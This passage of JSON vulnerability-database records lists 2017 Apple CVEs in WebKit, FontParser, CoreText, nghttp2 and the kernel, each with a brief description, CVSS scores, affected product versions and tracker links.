"2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2394", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2394"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2394", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2394", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:53:45", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2367", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2367"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2367", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2454", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2454"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2454", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2454", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2460", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2460"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2460", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2460", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2466", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2466"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2466", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2466", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2481", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2481"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2481", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2481", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2470", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2470"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2470", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2470", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2386", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2386"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2386", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2386", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2469", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2469"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2469", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2469", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2459", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2459"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2459", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2459", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T16:34:37", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to conduct Universal XSS (UXSS) attacks via crafted frame objects.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-04-02T01:59:00", "type": "debiancve", "title": "CVE-2017-2445", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2445"], "modified": "2017-04-02T01:59:00", "id": "DEBIANCVE:CVE-2017-2445", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2445", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-10T16:34:38", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2394", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2394"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2394", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2394", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:46:43", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"FontParser\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted font file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2406", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2406"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2406", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2406", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:48:27", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. 
The issue involves nghttp2 before 1.17.0 in the \"HTTPProtocol\" component. It allows remote HTTP/2 servers to have an unspecified impact via unknown vectors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2428", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2428"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2428", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2428", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:41", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. 
The issue involves the \"CoreText\" component. It allows remote attackers to cause a denial of service (resource consumption) via a crafted text message.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2461", "cwe": ["CWE-20", "CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2461"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2461", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:52:02", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. 
The issue involves the \"Kernel\" component. A buffer overflow allows attackers to execute arbitrary code in a privileged context via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2482", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2482"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2482", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2482", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:45:24", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
